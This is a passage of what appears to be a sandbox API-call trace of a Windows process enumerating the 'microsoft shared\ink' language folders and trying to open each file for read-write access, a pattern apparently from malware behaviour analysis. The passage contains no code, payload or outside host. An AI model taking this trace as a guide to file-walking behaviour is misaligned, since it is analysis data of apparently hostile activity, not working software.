ftLastWriteTime.dwLowDateTime=0x8cee0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0098.710] FindClose (in: hFindFile=0x78290 | out: hFindFile=0x78290) returned 1 [0098.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0098.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0098.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0098.711] AreFileApisANSI () returned 1 [0098.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR", lpUsedDefaultChar=0x0) returned 57 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0098.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0098.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.711] AreFileApisANSI () returned 1 [0098.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0098.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 57 [0098.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.712] GetLastError () returned 0x5 [0098.712] GetLastError () returned 0x5 [0098.712] SetLastError (dwErrCode=0x5) [0098.712] GetLastError () returned 0x5 [0098.712] SetLastError (dwErrCode=0x5) [0098.712] GetLastError () returned 0x5 [0098.712] SetLastError (dwErrCode=0x5) [0098.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0098.712] AreFileApisANSI () returned 1 [0098.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0098.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 57 [0098.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.712] GetLastError () returned 0x5 [0098.712] GetLastError () returned 0x5 [0098.712] SetLastError (dwErrCode=0x5) [0098.712] GetLastError () returned 0x5 [0098.712] SetLastError (dwErrCode=0x5) [0098.712] GetLastError () returned 0x5 [0098.712] SetLastError (dwErrCode=0x5) [0098.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0098.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0098.713] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0098.713] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78250 [0098.713] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.713] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0098.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.714] AreFileApisANSI () returned 1 [0098.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0098.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0098.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.714] AreFileApisANSI () returned 1 [0098.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0098.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 73 [0098.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.715] GetFileType (hFile=0x27c) returned 0x1 [0098.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0098.715] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.715] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.715] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.715] CloseHandle (hObject=0x27c) returned 1 [0098.716] AreFileApisANSI () returned 1 [0098.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0098.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 73 [0098.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.716] GetLastError () returned 0x5 [0098.716] GetLastError () returned 0x5 [0098.716] SetLastError (dwErrCode=0x5) [0098.716] GetLastError () returned 0x5 [0098.716] SetLastError (dwErrCode=0x5) [0098.716] GetLastError () returned 0x5 [0098.716] SetLastError (dwErrCode=0x5) [0098.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0098.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0098.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.716] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d2d0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0098.716] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0098.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0098.717] AreFileApisANSI () returned 1 [0098.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB", lpUsedDefaultChar=0x0) returned 57 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0098.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0098.718] AreFileApisANSI () returned 1 [0098.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0098.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 57 [0098.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.718] GetLastError () returned 0x5 [0098.718] GetLastError () returned 0x5 [0098.718] SetLastError (dwErrCode=0x5) [0098.718] GetLastError () returned 0x5 [0098.718] SetLastError (dwErrCode=0x5) [0098.718] GetLastError () returned 0x5 [0098.718] SetLastError (dwErrCode=0x5) [0098.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0098.718] AreFileApisANSI () returned 1 [0098.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0098.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, 